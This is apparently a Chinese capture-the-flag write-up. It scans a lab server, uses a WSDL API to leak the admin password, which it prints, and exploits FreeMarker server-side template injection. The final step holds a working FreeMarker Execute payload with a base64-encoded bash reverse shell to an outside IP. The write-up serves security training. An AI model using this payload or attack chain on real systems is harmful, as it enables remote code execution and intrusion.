1:老规矩Kali dirsearch -u http://106.15.50.112:28081/ -r -t 50 先扫一波,这里使用了参数-r 表示递归扫描,所谓递归就是在已发现的目录继续深层次的扫描。-t 设置线程为50
发现一个/admin/service目录为200响应码,由于题目是api漏洞。其他200响应码都是一些登录的什么的就略过,直接定位到/admin/service这个目录。浏览器打开!
2:仔细观察是一个api接口文档并且是WSDL 格式的,为了好辨识有哪些接口并且接口是什么类型参数,我们打开Burp Suite 同时点击上面的WSDL文档链接开启抓包发送到解析WSDL文档插件。注意是响应包内容!
解析结果有7个api个接口,从api的命名我们要大概分辨出这个api功能是什么。由于这里只有几个接口,如果有几十个甚至上百个的话就从黑盒角度来说只能找敏感的接口进行测试。言归正传:把这几个api接口全部发送到重放器(Repeater)
3:对每个api接口的参数值进行测试,全部都Send发包一下看看返回的内容对我们做题有没有帮助。也可以尝试SQL注入,这里我进行尝试了暂时没有发现。因为我只尝试了一个接口,万一其他接口存在SQL注入呢?也说不定!根据接口的命名分析,有几个接口意思就是根据用户名获取信息的,一般就联想到admin这个用户。根据接口每个参数值修改为admin发送包观察返回内容,这里有个注意点也是重中之重!!!在Burp里面xml格式的内容对换行符特别敏感\r\n ,反正就是不能复制之前手打的admin字符串,因为会有隐藏的\r\n。这里坑了我好久!!!草!
成功返回密码信息!
4:拿去后台登录:http://106.15.50.112:28081/admin
admin 2022_whalwl_huanyingni
登录成功!从黑盒角度来看,先查看后台使用的cms,是否有历史漏洞!
右键查看源代码查看后台cms的指纹信息!
上面几个我看了几个关于css链接没找到可用信息,但是在最后一个style.css我发现了版本信息
百度一波,发现有一个长得一模一样的!
大概看了下是国外的,国内的中文版都是翻译的!是一个纯前端技术实现的后台cms,数据交互也都是调用api了!但是不能确定题目这个cms和我网上找的到底是不是同一个,也有可能是魔改的!不管它先暂时搁置。那我们就来看后端api使用什么语言写的服务,老规矩访问首页,打开浏览器看看响应头。
发现了JSESSIONID,据我了解这个玩意儿是Java语言才有的。赶紧百度确认!
确定了后端api是Java语言,因为老师前几天就说了这题是SSTI 模板注入。赶紧翻笔记。
原理:
用户代入到服务端的内容, 会被模板引擎进行解析
漏洞容易出现的环境:
非REST风格的, 并且为MVC架构的网站
探测:
使用枚举的方式, 代入${3*3}, 如果有解析 会返回结果 9, 证明这个点会解析模板表达式
那还等什么,去后台找注入点!
发现其他功能点都是关闭的!出题者有心了!显而易见注入点已经以间接的形式告诉我们了,就在添加新闻那里!直接添加新闻,每个地方都不能错过,写上注入表达式${9*9}
然后去查看发布的新闻:
9*9 = 81 确实解析了,因为我们传入了表达式到后端,后端看到${}就会当成表达式去解析导致代码注入。修改我们的语句为反弹shell:<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDguMTkxLjE1My8xMjMwNiAwPiYx}|{base64,-d}|{bash,-i}") }
5:再次发布一个新闻反弹shell!
反弹成功!,flag在根目录!
扫一扫
4849
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
